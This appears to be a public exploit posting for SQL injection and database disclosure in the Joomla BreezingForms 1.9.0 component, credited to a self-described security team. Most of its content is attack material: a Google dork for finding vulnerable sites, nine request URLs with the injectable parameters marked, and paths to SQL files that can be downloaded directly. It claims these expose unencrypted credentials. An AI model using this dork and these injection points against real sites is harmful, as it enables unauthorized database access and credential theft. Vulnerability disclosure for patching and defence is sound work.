#################################################################### # Exploit Title : Joomla BreezingForms 1.9.0 SQL Injection / Database Disclosure # Author [ Discovered By ] : KingSkrupellos # Team : Cyberizm Digital Security Army # Date : 10/02/2019 # Vendor Homepage : crosstec.org # Software Download Link : crosstec.org/en/breezingforms-lite.html crosstec.org/en/downloads/breezingforms-for-joomla.html github.com/sdc/DevonStudioSchool/tree/master/administrator/components/com_breezingforms/ # Software Information Link : extensions.joomla.org/extension/breezing-forms/ crosstec.org/en/downloads/breezingforms-for-joomla.html # Software Version : (build 930) - 1.9.0 # Software Requirements: Joomla!(r) 3.x or 2.5. -- Version: 1.9.0 (build 930) # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # Google Dorks : inurl:''/index.php?option=com_breezingforms'' # Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] # PacketStormSecurity : packetstormsecurity.com/files/authors/13968 # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/ # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos #################################################################### # Description about Software : *************************** BreezingForms (free) is the only free joomla forms, state of the art form builder for Joomla!(r) that combines modern techniques with enterprise features. #################################################################### # Impact : *********** * Joomla BreezingForms 1.9.0 and other versions - component for Joomla is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. A remote attacker can send a specially crafted request to the vulnerable application and execute arbitrary SQL commands in application`s database. Further exploitation of this vulnerability may result in unauthorized data manipulation. An attacker can exploit this issue using a browser. * This Software prone to an information exposure/database disclosure vulnerability. Successful exploits of this issue may allow an attacker to obtain sensitive information by downloading the full contents of the application's database. * Any remote user may download the database files and gain access to sensitive information including unencrypted authentication credentials. #################################################################### # SQL Injection Exploit : ********************** /index.php?option=com_breezingforms&view=form&Itemid=[SQL Injection] /index.php?option=com_breezingforms&Itemid=[SQL Injection]&lang=hu /index.php?lang=&raw=true&option=com_breezingforms&checkCaptcha=true&Itemid=[SQL Injection] /index.php?raw=true&option=com_breezingforms&bfCaptcha=true&Itemid=[ID-NUMBER]&bfMathRandom=[SQL Injection] /index.php?option=com_breezingforms&view=form&Itemid=[SQL Injection]&lang=de&new_lang=bg&new_lang=eng&nLang=nl /index.php?lang=&raw=true&option=com_breezingforms&checkCaptcha=true&Itemid=[ID-NUMBER]&value=[SQL Injection] /index.php?lang=&raw=true&option=com_breezingforms&checkCaptcha=true&Itemid=[ID-NUMBER]&tmpl=component&value=[SQL Injection] /index.php?option=com_breezingforms&Itemid=[ID-NUMBER]&ff_form=[ID-NUMBER]&ff_applic=mod_facileforms&ff_module_id=[ID-NUMBER]&format=html&tmpl=component&ff_frame=[SQL Injection] /index.php?option=com_breezingforms&tmpl=component&Itemid=[ID-NUMBER]&ff_contentid=[ID-NUMBER]&ff_form=[ID-NUMBER]&ff_applic=plg_facileforms&format=html&ff_frame=[SQL Injection] # Database Disclosure Exploit : *************************** /administrator/components/com_breezingforms/sql/upgrade_1.1.sql /administrator/components/com_breezingforms/sql/upgrade_1.2.sql /administrator/components/com_breezingforms/sql/upgrade_1.3.sql /administrator/components/com_breezingforms/sql/upgrade_1.4.sql #################################################################### # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team ####################################################################